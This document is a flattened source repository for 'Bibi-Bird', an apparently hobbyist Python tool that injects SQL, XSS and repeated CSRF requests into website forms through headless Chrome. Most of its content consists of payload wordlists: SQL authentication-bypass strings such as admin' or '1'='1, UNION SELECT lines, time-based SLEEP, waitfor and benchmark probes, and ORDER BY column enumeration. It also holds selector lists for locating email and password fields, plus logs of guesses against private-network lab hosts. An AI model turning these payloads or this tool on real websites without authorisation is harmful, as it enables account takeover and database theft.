├── modules ├── __init.__.py ├── __pycache__ │ ├── bireq.cpython-312.pyc │ ├── mods.cpython-312.pyc │ └── scans.cpython-312.pyc ├── mods.py ├── bireq.py └── scans.py ├── data ├── InputSelectors.txt ├── values.txt ├── EmailSelectors.txt ├── PassSelectors.txt └── gueses.json ├── dict ├── xss-common.txt ├── sql-common.txt ├── sql-time.txt └── sql-generic.txt ├── requirements.txt ├── tests └── request.txt ├── README.md └── main.py /modules/__init.__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /data/InputSelectors.txt: -------------------------------------------------------------------------------- 1 | input -------------------------------------------------------------------------------- /data/values.txt: -------------------------------------------------------------------------------- 1 | password 2 | passwordRepeat 3 | email 4 | Email 5 | securityQuestion 6 | securityAnswer 7 | -------------------------------------------------------------------------------- /dict/xss-common.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | '\"> -------------------------------------------------------------------------------- /modules/__pycache__/bireq.cpython-312.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alfredredbird/Bibi-Bird/HEAD/modules/__pycache__/bireq.cpython-312.pyc -------------------------------------------------------------------------------- /modules/__pycache__/mods.cpython-312.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alfredredbird/Bibi-Bird/HEAD/modules/__pycache__/mods.cpython-312.pyc -------------------------------------------------------------------------------- /modules/__pycache__/scans.cpython-312.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alfredredbird/Bibi-Bird/HEAD/modules/__pycache__/scans.cpython-312.pyc -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | requests 3 | rich 4 | alive_progress 5 | torrequest 6 | tqdm 7 | bs4 8 | wget 9 | selenium 10 | cryptography 11 | phonenumbers 12 | Flask==3.0.2 13 | datetime 14 | pypresence 15 | -------------------------------------------------------------------------------- /tests/request.txt: -------------------------------------------------------------------------------- 1 | POST /api/Users/ HTTP/1.1 2 | Host: 192.168.12.146:3000 3 | Content-Length: 246 4 | Accept: application/json, text/plain, */* 5 | Accept-Language: en-US,en;q=0.9 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36 7 | Content-Type: application/json 8 | Origin: http://192.168.12.146:3000 9 | Referer: http://192.168.12.146:3000/ 10 | Accept-Encoding: gzip, deflate, br 11 | Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=PJvKkMbl7jagrmzBN6d9ot6S3f7hlZuqxtm8u2KTJW058yL2Zpq4woWeRx9X 12 | Connection: keep-alive 13 | 14 | {"email":"12345@12233.com","poparrot":"123","password":"12345","passwordRepeat":"12345","securityQuestion":{"id":1,"question":"Your eldest siblings middle name?","createdAt":"2024-09-22T05:07:00.066Z","updatedAt":"2024-09-22T05:07:00.066Z"},"securityAnswer":"ee"} -------------------------------------------------------------------------------- /data/EmailSelectors.txt: -------------------------------------------------------------------------------- 1 | email 2 | Email 3 | emial 4 | EMAIL 5 | mail 6 | Mail 7 | emailAddress 8 | EmailAddress 9 | email_address 10 | Email_Address 11 | eMail 12 | 
E-mail 13 | E-Mail 14 | e_mail 15 | EmailID 16 | emailID 17 | Email_Id 18 | email_Id 19 | userEmail 20 | UserEmail 21 | user_email 22 | User_email 23 | username 24 | Username 25 | user 26 | User 27 | users 28 | Users 29 | userName 30 | UserName 31 | uName 32 | uname 33 | User_Name 34 | user_name 35 | mailID 36 | MailID 37 | mail_id 38 | Mail_id 39 | contactEmail 40 | ContactEmail 41 | contact_email 42 | Contact_Email 43 | registerEmail 44 | RegisterEmail 45 | register_email 46 | Register_email 47 | loginEmail 48 | LoginEmail 49 | login_email 50 | Login_email 51 | accountEmail 52 | AccountEmail 53 | //*[@type="email"] 54 | //*[@type="Email"] 55 | //*[@type="emial"] 56 | //*[@type="EMAIL"] 57 | //*[@type="mail"] 58 | //*[@type="EmailAddress"] 59 | //*[@type="email_address"] 60 | //*[@type="eMail"] 61 | //*[@type="E-Mail"] 62 | //*[@type="e_mail"] 63 | //*[@type="EmailID"] 64 | //*[@type="userEmail"] 65 | //*[@type="username"] 66 | //*[@type="user"] 67 | //*[@type="users"] 68 | //*[@type="userName"] 69 | //*[@type="uName"] 70 | //*[@type="mailID"] 71 | //*[@type="contactEmail"] 72 | //*[@type="registerEmail"] 73 | //*[@type="loginEmail"] 74 | //*[@type="accountEmail"] 75 | -------------------------------------------------------------------------------- /dict/sql-common.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or 
'1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" # 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 -------------------------------------------------------------------------------- /data/PassSelectors.txt: -------------------------------------------------------------------------------- 1 | password 2 | Password 3 | pass 4 | Pass 5 | pswd 6 | PSWD 7 | //*[@type="password"] 8 | //*[@type="Password"] 9 | //*[@type="pass"] 10 | //*[@type="Pass"] 11 | //*[@type="pswd"] 12 | //*[@type="PSWD"] 13 | password 14 | Password 15 | pass 16 | Pass 17 | pswd 18 | PSWD 19 | passwd 20 | Passwd 21 | pword 22 | Pword 23 | pwd 24 | PWD 25 | pass_word 26 | Pass_word 27 | passwrd 28 | Passwrd 29 | password1 30 | Password1 31 | password_1 32 | Password_1 33 | psswd 34 | Psswd 35 | passField 36 | PassField 37 | pwdField 38 | PwdField 39 | passwordField 40 | PasswordField 41 | loginPassword 42 | LoginPassword 43 | userPassword 44 | UserPassword 45 | userPwd 46 | UserPwd 47 | authentication 48 | Authentication 49 | //*[@type="password"] 50 | //*[@type="Password"] 51 | //*[@type="pass"] 52 | //*[@type="Pass"] 53 | //*[@type="pswd"] 54 | //*[@type="PSWD"] 55 | 
//*[@type="passwd"] 56 | //*[@type="Passwd"] 57 | //*[@type="pword"] 58 | //*[@type="Pword"] 59 | //*[@type="pwd"] 60 | //*[@type="PWD"] 61 | //*[@type="pass_word"] 62 | //*[@type="Pass_word"] 63 | //*[@type="password1"] 64 | //*[@type="Password1"] 65 | //*[@type="password_1"] 66 | //*[@type="Password_1"] 67 | //*[@type="psswd"] 68 | //*[@type="Psswd"] 69 | //*[@type="passField"] 70 | //*[@type="PassField"] 71 | //*[@type="pwdField"] 72 | //*[@type="PwdField"] 73 | //*[@type="passwordField"] 74 | //*[@type="PasswordField"] 75 | //*[@type="loginPassword"] 76 | //*[@type="LoginPassword"] 77 | //*[@type="userPassword"] 78 | //*[@type="UserPassword"] 79 | //*[@type="userPwd"] 80 | //*[@type="UserPwd"] 81 | //*[@type="authentication"] 82 | //*[@type="Authentication"] 83 | -------------------------------------------------------------------------------- /dict/sql-time.txt: -------------------------------------------------------------------------------- 1 | sleep(5)# 2 | 1 or sleep(5)# 3 | " or sleep(5)# 4 | ' or sleep(5)# 5 | " or sleep(5)=" 6 | ' or sleep(5)=' 7 | 1) or sleep(5)# 8 | ") or sleep(5)=" 9 | ') or sleep(5)=' 10 | 1)) or sleep(5)# 11 | ")) or sleep(5)=" 12 | ')) or sleep(5)=' 13 | ;waitfor delay '0:0:5'-- 14 | );waitfor delay '0:0:5'-- 15 | ';waitfor delay '0:0:5'-- 16 | ";waitfor delay '0:0:5'-- 17 | ');waitfor delay '0:0:5'-- 18 | ");waitfor delay '0:0:5'-- 19 | ));waitfor delay '0:0:5'-- 20 | '));waitfor delay '0:0:5'-- 21 | "));waitfor delay '0:0:5'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | pg_sleep(5)-- 33 | 1 or pg_sleep(5)-- 34 | " or pg_sleep(5)-- 35 | ' or pg_sleep(5)-- 36 | 1) or pg_sleep(5)-- 37 | ") or 
pg_sleep(5)-- 38 | ') or pg_sleep(5)-- 39 | 1)) or pg_sleep(5)-- 40 | ")) or pg_sleep(5)-- 41 | ')) or pg_sleep(5)-- 42 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe 43 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' 44 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) 45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- 46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# 47 | SLEEP(5)# 48 | SLEEP(5)-- 49 | SLEEP(5)=" 50 | SLEEP(5)=' 51 | or SLEEP(5) 52 | or SLEEP(5)# 53 | or SLEEP(5)-- 54 | or SLEEP(5)=" 55 | or SLEEP(5)=' 56 | waitfor delay '00:00:05' 57 | waitfor delay '00:00:05'-- 58 | waitfor delay '00:00:05'# 59 | benchmark(50000000,MD5(1)) 60 | benchmark(50000000,MD5(1))-- 61 | benchmark(50000000,MD5(1))# 62 | or benchmark(50000000,MD5(1)) 63 | or benchmark(50000000,MD5(1))-- 64 | or benchmark(50000000,MD5(1))# 65 | pg_SLEEP(5) 66 | pg_SLEEP(5)-- 67 | pg_SLEEP(5)# 68 | or pg_SLEEP(5) 69 | or pg_SLEEP(5)-- 70 | or pg_SLEEP(5)# 71 | '\" 72 | AnD SLEEP(5) 73 | AnD SLEEP(5)-- 74 | AnD SLEEP(5)# 75 | &&SLEEP(5) 76 | &&SLEEP(5)-- 77 | &&SLEEP(5)# 78 | ' AnD SLEEP(5) ANd '1 79 | '&&SLEEP(5)&&'1 80 | ORDER BY SLEEP(5) 81 | ORDER BY SLEEP(5)-- 82 | ORDER BY SLEEP(5)# 83 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj) 84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# 85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- 86 | +benchmark(3200,SHA1(1))+' 87 | + SLEEP(10) + ' 88 | RANDOMBLOB(500000000/2) 89 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 90 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 91 | RANDOMBLOB(1000000000/2) 92 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 93 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 94 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ 95 | -------------------------------------------------------------------------------- /dict/sql-generic.txt: -------------------------------------------------------------------------------- 1 | OR 1=1 2 | OR 1=0 3 | OR x=x 4 | OR x=y 5 | 
OR 1=1# 6 | OR 1=0# 7 | OR x=x# 8 | OR x=y# 9 | OR 1=1-- 10 | OR 1=0-- 11 | OR x=x-- 12 | OR x=y-- 13 | OR 3409=3409 AND ('pytW' LIKE 'pytW 14 | OR 3409=3409 AND ('pytW' LIKE 'pytY 15 | HAVING 1=1 16 | HAVING 1=0 17 | HAVING 1=1# 18 | HAVING 1=0# 19 | HAVING 1=1-- 20 | HAVING 1=0-- 21 | AND 1=1 22 | AND 1=0 23 | AND 1=1-- 24 | AND 1=0-- 25 | AND 1=1# 26 | AND 1=0# 27 | AND 1=1 AND '%'=' 28 | AND 1=0 AND '%'=' 29 | AND 1083=1083 AND (1427=1427 30 | AND 7506=9091 AND (5913=5913 31 | AND 1083=1083 AND ('1427=1427 32 | AND 7506=9091 AND ('5913=5913 33 | AND 7300=7300 AND 'pKlZ'='pKlZ 34 | AND 7300=7300 AND 'pKlZ'='pKlY 35 | AND 7300=7300 AND ('pKlZ'='pKlZ 36 | AND 7300=7300 AND ('pKlZ'='pKlY 37 | AS INJECTX WHERE 1=1 AND 1=1 38 | AS INJECTX WHERE 1=1 AND 1=0 39 | AS INJECTX WHERE 1=1 AND 1=1# 40 | AS INJECTX WHERE 1=1 AND 1=0# 41 | AS INJECTX WHERE 1=1 AND 1=1-- 42 | AS INJECTX WHERE 1=1 AND 1=0-- 43 | WHERE 1=1 AND 1=1 44 | WHERE 1=1 AND 1=0 45 | WHERE 1=1 AND 1=1# 46 | WHERE 1=1 AND 1=0# 47 | WHERE 1=1 AND 1=1-- 48 | WHERE 1=1 AND 1=0-- 49 | ORDER BY 1-- 50 | ORDER BY 2-- 51 | ORDER BY 3-- 52 | ORDER BY 4-- 53 | ORDER BY 5-- 54 | ORDER BY 6-- 55 | ORDER BY 7-- 56 | ORDER BY 8-- 57 | ORDER BY 9-- 58 | ORDER BY 10-- 59 | ORDER BY 11-- 60 | ORDER BY 12-- 61 | ORDER BY 13-- 62 | ORDER BY 14-- 63 | ORDER BY 15-- 64 | ORDER BY 16-- 65 | ORDER BY 17-- 66 | ORDER BY 18-- 67 | ORDER BY 19-- 68 | ORDER BY 20-- 69 | ORDER BY 21-- 70 | ORDER BY 22-- 71 | ORDER BY 23-- 72 | ORDER BY 24-- 73 | ORDER BY 25-- 74 | ORDER BY 26-- 75 | ORDER BY 27-- 76 | ORDER BY 28-- 77 | ORDER BY 29-- 78 | ORDER BY 30-- 79 | ORDER BY 31337-- 80 | ORDER BY 1# 81 | ORDER BY 2# 82 | ORDER BY 3# 83 | ORDER BY 4# 84 | ORDER BY 5# 85 | ORDER BY 6# 86 | ORDER BY 7# 87 | ORDER BY 8# 88 | ORDER BY 9# 89 | ORDER BY 10# 90 | ORDER BY 11# 91 | ORDER BY 12# 92 | ORDER BY 13# 93 | ORDER BY 14# 94 | ORDER BY 15# 95 | ORDER BY 16# 96 | ORDER BY 17# 97 | ORDER BY 18# 98 | ORDER BY 19# 99 | ORDER BY 20# 100 | ORDER BY 
21# 101 | ORDER BY 22# 102 | ORDER BY 23# 103 | ORDER BY 24# 104 | ORDER BY 25# 105 | ORDER BY 26# 106 | ORDER BY 27# 107 | ORDER BY 28# 108 | ORDER BY 29# 109 | ORDER BY 30# 110 | ORDER BY 31337# 111 | ORDER BY 1 112 | ORDER BY 2 113 | ORDER BY 3 114 | ORDER BY 4 115 | ORDER BY 5 116 | ORDER BY 6 117 | ORDER BY 7 118 | ORDER BY 8 119 | ORDER BY 9 120 | ORDER BY 10 121 | ORDER BY 11 122 | ORDER BY 12 123 | ORDER BY 13 124 | ORDER BY 14 125 | ORDER BY 15 126 | ORDER BY 16 127 | ORDER BY 17 128 | ORDER BY 18 129 | ORDER BY 19 130 | ORDER BY 20 131 | ORDER BY 21 132 | ORDER BY 22 133 | ORDER BY 23 134 | ORDER BY 24 135 | ORDER BY 25 136 | ORDER BY 26 137 | ORDER BY 27 138 | ORDER BY 28 139 | ORDER BY 29 140 | ORDER BY 30 141 | ORDER BY 31337 142 | RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 143 | RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' 144 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- 145 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- 146 | %' AND 8310=8310 AND '%'=' 147 | %' AND 8310=8311 AND '%'=' 148 | and (select substring(@@version,1,1))='X' 149 | and (select substring(@@version,1,1))='M' 150 | and (select substring(@@version,2,1))='i' 151 | and (select substring(@@version,2,1))='y' 152 | and (select substring(@@version,3,1))='c' 153 | and (select substring(@@version,3,1))='S' 154 | and (select substring(@@version,3,1))='X' 155 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![bibi-bird-480-text](https://github.com/user-attachments/assets/a0836bfa-6012-4502-b891-2416222bb0f2) 3 | 4 | 5 | # 🔍 Overview 6 | Bibi Bird is a tool written in Python that tests websites for SQL Injections, XSS and other vulnerabilities. My tool is still in beta but works 90% of the time.
7 | 8 | 9 | # 📦 Installation 10 | 11 | git clone https://github.com/alfredredbird/Bibi-Bird 12 | cd Bibi-Bird && sudo pip3 install -r requirements.txt 13 | python3 main.py 14 | 15 | # 📦 Manual Install 16 | 17 | download the latest release from: https://github.com/alfredredbird/Bibi-Bird/releases. 18 | then extract the zip or tar.gz 19 | 20 | cd Bibi-Bird && sudo pip3 install -r requirements.txt 21 | python3 Bibi-Bird 22 | 23 | 24 | # 💻 Tested OS 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 |
| Operating system | Version |
| --- | --- |
| MacOS | Monterey 12.6.7 |
| Windows | 11/10 |
| Kali linux | Rolling / Sana |
| Parrot OS | 3.1 |
| Ubuntu | 22.04/20.04 |
| Debian | 10.00 |
| Alpine | 3.10 |
| Fedora | v33 |
| Arch Linux | 2021.07.01 |
| Manjaro | 21 |
| Void | Rolling Release |
76 | 77 | # 📖 Requirements 78 | 79 | There Is A Lot Lol 80 | 81 | - colorama 82 | - requests 83 | - selenium 84 | - alive_progress 85 | - bs4 86 | 87 | # 🗣️Supported Languages 88 | (we need translators 😭) 89 | - [x] English 90 | - [ ] Italian 91 | - [ ] Hebrew 92 | - [ ] Spanish 93 | - [ ] French 94 | - [ ] Arabic 95 | - [ ] German 96 | - [ ] Hindi 97 | - [ ] Russian 98 | - [ ] Portuguese 99 | 100 | # 📕 Upcoming Features 101 | (They Are Great First Issues :D) 102 | 103 | - [x] SQL Injections 104 | - [ ] SQL Detections 105 | - [ ] DNS Scanning 106 | - [ ] URL Brute Forcing 107 | - [ ] Reports 108 | - [X] XSS Injecting 109 | - [ ] Site OSINT 110 | - [ ] Custom Wordlists 111 | - [ ] Payload Generation 112 | - [X] Payload Selection 113 | - [X] CSRF Attacks (beta) 114 | 115 | # ⁉️ Need Help? 116 | Check out https://github.com/alfredredbird/Bibi-Bird/issues or the WiKi for help. 117 | Still Need Help? Contact Below :D 118 | 119 | # 📗 Info: 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 |
- Wiki: https://github.com/alfredredbird/Bibi-Bird/wiki
- Releases: https://github.com/alfredredbird/Bibi-Bird/releases
- Contributors: https://github.com/alfredredbird/Bibi-Bird/graphs/contributors
135 | 136 | # 📘 Contact 137 | 138 | - Twitter: https://twitter.com/alfredredbird1 139 | - LinkedIn: https://www.linkedin.com/in/jeffrey-montanari-7178a1290/ 140 | 141 | # 🛠 Other Tools 142 | 143 | Other tools in the fleet: 144 | - Tookie-OSINT: http://github.com/alfredredbird/tookie-osint 145 | 146 | # 🤝 Partnership 147 | Want to partner with the Bibi-Bird project? Feel free to reach out! 148 | 149 | partners: 150 | 151 | ~ Mrofcodyx - [Git-eXposed](https://github.com/mrofcodyx/Git-eXposed) 152 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | from bs4 import BeautifulSoup 4 | import argparse 5 | from modules.scans import * 6 | from modules.mods import * 7 | from modules.bireq import * 8 | # Variables ᕕ( ᐛ )ᕗ 9 | url = "" 10 | wordlistpath = "" 11 | payload = 0 12 | delay = 3 13 | 14 | parser = argparse.ArgumentParser( 15 | prog='BiBi', 16 | description='Scans websites for vulnerabilities', 17 | epilog='Hello from Bibi') 18 | 19 | parser.add_argument('-b', '--brute', action='store_true') 20 | parser.add_argument('-u', '--url') 21 | parser.add_argument('-l', '--lengths', type=int, nargs=2, help='Minimum and maximum length for subdomain brute-forcing') 22 | parser.add_argument('-w', '--wordlist') 23 | parser.add_argument('-i', '--inject', action='store_true', help='SQL Injection Mode') 24 | parser.add_argument('-p', '--payload', type=int) 25 | parser.add_argument('-d', '--delay', type=int) 26 | parser.add_argument('-x', '--xss', type=int) 27 | parser.add_argument('-r', '--repeat', type=int) 28 | parser.add_argument('-c', '--csrf', type=str, help='Cross Site Request Forgery Mode') 29 | 30 | arg = parser.parse_args() 31 | 32 | # main functions on start up 33 | 34 | chrome_options = Options() 35 | 36 | chrome_options.add_argument("--headless") 37 | chrome_options.add_argument("--no-sandbox") 38 | 
chrome_options.add_argument("--disable-dev-shm-usage") 39 | chrome_options.add_argument("--disable-software-rasterizer") 40 | chrome_options.add_argument("--disable-gpu") 41 | chrome_options.add_argument( "--log-level=3") 42 | driver = webdriver.Chrome(options=chrome_options) 43 | 44 | headers = { 45 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36", 46 | "Accept-Language": "en-US,en;q=0.9", 47 | "Accept-Encoding": "gzip, deflate, br", 48 | "Connection": "keep-alive", 49 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 50 | "Upgrade-Insecure-Requests": "1", 51 | "Referer": "https://www.google.com/", 52 | "DNT": "1" 53 | } 54 | 55 | if arg.url is None and arg.csrf is None: 56 | url = input("Target: ") 57 | else: 58 | url = arg.url 59 | 60 | if arg.payload: 61 | payload = arg.payload 62 | 63 | if arg.delay: 64 | delay = arg.delay 65 | if arg.xss: 66 | mode = arg.xss 67 | 68 | 69 | if arg.wordlist: 70 | if arg.wordlist is None: 71 | wordlistpath = input("Wordlist: ") 72 | else: 73 | wordlistpath = arg.wordlist 74 | 75 | try: 76 | if url is not None: 77 | response = requests.get(str(url), headers=headers) 78 | else: 79 | pass 80 | except Exception as e: 81 | print("================================================") 82 | print(f"Error: {e}") 83 | print("================================================") 84 | exit(1) 85 | 86 | logo(url,response) 87 | 88 | if response.status_code >= 400: 89 | print("Error") 90 | else: 91 | try: 92 | if arg.brute: 93 | # brute(url,driver,response) 94 | subdomain(url,driver, "dict/sec.txt") 95 | if arg.inject: 96 | inject(url,driver,response,wordlistpath,payload,delay) 97 | if arg.xss: 98 | xssScan(driver,url,mode) 99 | if arg.csrf: 100 | if arg.repeat is None: 101 | repeat_count = int(input("Enter the number of times to repeat the request: ")) # User-defined 
repeat count 102 | else: 103 | repeat_count = arg.repeat 104 | send_repeated_requests(arg.csrf, repeat_count, url) 105 | except KeyboardInterrupt: 106 | print("⟪ ⟫") 107 | print("⟪ Stopping... ⟫") 108 | print("⟪ ⟫") 109 | print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫") 110 | exit(1) 111 | print("⟪ ⟫") 112 | print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫") -------------------------------------------------------------------------------- /data/gueses.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "url": "http://192.168.12.146:3000/#/login", 4 | "count": 30, 5 | "date": "2024-09-10T11:29:40.863090" 6 | }, 7 | { 8 | "url": "http://192.168.12.146:3000/#/login", 9 | "count": 25, 10 | "date": "2024-09-10T11:30:11.920031" 11 | }, 12 | { 13 | "url": "http://192.168.12.146:3000/#/login", 14 | "count": 24, 15 | "date": "2024-09-10T11:30:24.070418" 16 | }, 17 | { 18 | "url": "http://192.168.12.146:8096/web/index.html#!/login.html", 19 | "count": 0, 20 | "date": "2024-09-10T11:32:52.081999" 21 | }, 22 | { 23 | "url": "http://192.168.12.146:3000/#/login", 24 | "count": 24, 25 | "date": "2024-09-10T11:48:13.560112" 26 | }, 27 | { 28 | "url": "http://192.168.12.146:3000/#/login", 29 | "count": 25, 30 | "date": "2024-09-10T11:48:24.983346" 31 | }, 32 | { 33 | "url": "http://192.168.12.146:8096/web/index.html#/login.html", 34 | "count": 78, 35 | "date": "2024-09-10T11:50:20.120825" 36 | }, 37 | { 38 | "url": "http://192.168.12.146:8096/web/index.html#/login.html", 39 | "count": 78, 40 | "date": "2024-09-10T11:51:22.552285" 41 | }, 42 | { 43 | "url": "http://192.168.12.146:3000/#/login", 44 | "count": 26, 45 | "date": "2024-09-10T13:11:51.650044" 46 | }, 47 | { 48 | "url": "http://192.168.12.146:3000/#/login", 49 | "count": 23, 50 | "date": "2024-09-10T14:46:03.670012" 51 | }, 52 | { 53 | "url": "http://192.168.12.146:3000/#/login", 54 | "count": 24, 55 | "date": "2024-09-10T14:58:18.638946" 56 | }, 57 | { 58 
| "url": "http://192.168.12.185:3000/#/login", 59 | "count": 23, 60 | "date": "2025-02-25T20:02:14.165204" 61 | }, 62 | { 63 | "url": "http://192.168.12.185:3000/#/login", 64 | "count": 23, 65 | "date": "2025-02-25T20:03:29.029265" 66 | }, 67 | { 68 | "url": "http://192.168.12.185:3000/#/login", 69 | "count": 23, 70 | "date": "2025-02-25T20:03:54.183693" 71 | }, 72 | { 73 | "url": "http://192.168.12.185:3000/#/login", 74 | "count": 23, 75 | "date": "2025-02-25T20:04:28.519720" 76 | }, 77 | { 78 | "url": "http://192.168.12.185:3000/#/login", 79 | "count": 23, 80 | "date": "2025-02-25T20:05:54.878972" 81 | }, 82 | { 83 | "url": "http://192.168.12.185:3000/#/login", 84 | "count": 23, 85 | "date": "2025-02-25T20:07:37.851733" 86 | }, 87 | { 88 | "url": "http://192.168.12.185:3000/#/login", 89 | "count": 23, 90 | "date": "2025-02-25T20:12:24.121173" 91 | }, 92 | { 93 | "url": "http://192.168.12.185:3000/#/login", 94 | "count": 23, 95 | "date": "2025-02-25T20:13:21.192749" 96 | }, 97 | { 98 | "url": "http://192.168.12.185:3000/#/login", 99 | "count": 23, 100 | "date": "2025-02-25T20:13:48.370286" 101 | }, 102 | { 103 | "url": "http://192.168.12.185:3000/#/login", 104 | "count": 23, 105 | "date": "2025-02-25T20:14:22.198106" 106 | }, 107 | { 108 | "url": "http://192.168.12.185:3000/#/login", 109 | "count": 23, 110 | "date": "2025-02-25T20:20:35.489058" 111 | }, 112 | { 113 | "url": "http://192.168.12.185:3000/#/login", 114 | "count": 23, 115 | "date": "2025-02-25T20:23:34.581701" 116 | }, 117 | { 118 | "url": "http://192.168.12.185:3000/#/login", 119 | "count": 23, 120 | "date": "2025-02-25T20:25:19.191382" 121 | }, 122 | { 123 | "url": "http://192.168.12.185:3000/#/login", 124 | "count": 23, 125 | "date": "2025-02-25T20:29:53.108808" 126 | }, 127 | { 128 | "url": "http://192.168.12.185:3000/#/login", 129 | "count": 23, 130 | "date": "2025-02-25T20:34:43.370957" 131 | }, 132 | { 133 | "url": "http://192.168.12.185:3000/#/login", 134 | "count": 23, 135 | "date": 
"2025-02-25T20:35:05.117607" 136 | }, 137 | { 138 | "url": "http://192.168.12.185:3000/#/login", 139 | "count": 23, 140 | "date": "2025-02-25T20:37:22.520430" 141 | }, 142 | { 143 | "url": "http://192.168.12.185:3000/#/login", 144 | "count": 23, 145 | "date": "2025-02-26T13:55:03.543371" 146 | }, 147 | { 148 | "url": "http://192.168.12.185:3000/#/login", 149 | "count": 23, 150 | "date": "2025-02-26T14:05:53.928406" 151 | }, 152 | { 153 | "url": "http://192.168.12.185:3000/#/login", 154 | "count": 23, 155 | "date": "2025-02-26T14:08:07.860356" 156 | }, 157 | { 158 | "url": "http://192.168.12.185:3000/#/login", 159 | "count": 23, 160 | "date": "2025-02-26T14:08:23.315978" 161 | } 162 | ] -------------------------------------------------------------------------------- /modules/mods.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import socket 4 | import sys 5 | from colorama import * 6 | import json 7 | import os 8 | from datetime import datetime 9 | 10 | 11 | def logo(url,response, count=0, pwd=0): 12 | 13 | os.system("cls" if os.name == "nt" else "clear") 14 | 